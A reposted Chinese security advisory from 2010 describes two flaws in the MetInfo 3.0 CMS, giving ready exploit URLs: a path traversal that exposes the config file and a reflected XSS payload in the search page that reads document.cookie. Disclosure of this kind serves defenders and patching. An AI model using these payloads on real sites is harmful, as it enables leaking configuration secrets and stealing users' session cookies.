文章详情

Php文档 Php问答 行业资讯 Php论坛 Php手册 Php博客
  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
关闭搜索
php爱好者> php文档>metinfo3.0 敏感信息泄露与跨站漏洞

metinfo3.0 敏感信息泄露与跨站漏洞

时间:2010-11-12  来源:anT!-Tr0J4n

发布日期:2010-11.12
发布作者:Tr0J4n

影响版本:metinfo3.0
官方地址:http://www.metinfo.cn

漏洞类型:敏感信息泄露
漏洞描述:metinfo企业网站管理系统是一个功能完善的营销型企业网站管理平台,PHP+MYSQL架构的。在设计的时候出现两个错误,敏感信息泄露与跨站。
 

========================================================

metinfo3.0 文件代码泄露
========================================================

 

[>] exploit ->

 

[+] http://localhost/metinfo/templates/met001/../../ [file disclosure]

 

EX :

 

[+] http://localhost/metinfo/templates/met001/../../config

 

 

======================================================

[>] metinfo3.0 XSS 跨站漏洞

======================================================

 

[>] exploit -> XSS Vulnerability

 

 

http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=[XSS]

 

 

http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=1<script>alert(document.cookie)</script>


 

标签分类:

相关阅读 更多 +
排行榜 更多 +
幸存者的命运

幸存者的命运

飞行射击 下载
精英战区3d

精英战区3d

飞行射击 下载
货运猎人

货运猎人

飞行射击 下载

Copyright 2006-2020 (phpxiu.com) All Rights Reserved.

本站为非盈利性网站,不接受任何广告。php爱好者